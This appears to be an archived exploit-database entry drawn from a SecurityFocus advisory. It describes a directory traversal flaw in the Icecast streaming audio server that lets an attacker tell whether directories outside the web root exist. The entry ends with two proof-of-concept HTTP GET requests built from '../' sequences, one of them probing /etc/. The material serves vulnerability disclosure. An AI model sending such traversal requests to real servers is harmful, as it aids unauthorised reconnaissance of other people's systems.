10 lines
No EOL
545 B
Text
Executable file
10 lines
No EOL
545 B
Text
Executable file
source: http://www.securityfocus.com/bid/5189/info
|
|
|
|
|
|
Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.
|
|
|
|
An attacker may exploit a directory traversal vulnerability in Icecast server to determine the existance of a specified directory outside of the web root. This is a result of the server returning different HTTP results for each case.
|
|
|
|
GET /file/../../../../../../../../nonexistent/ HTTP/1.0
|
|
|
|
GET /file/../../../../../../../../etc/ HTTP/1.0 |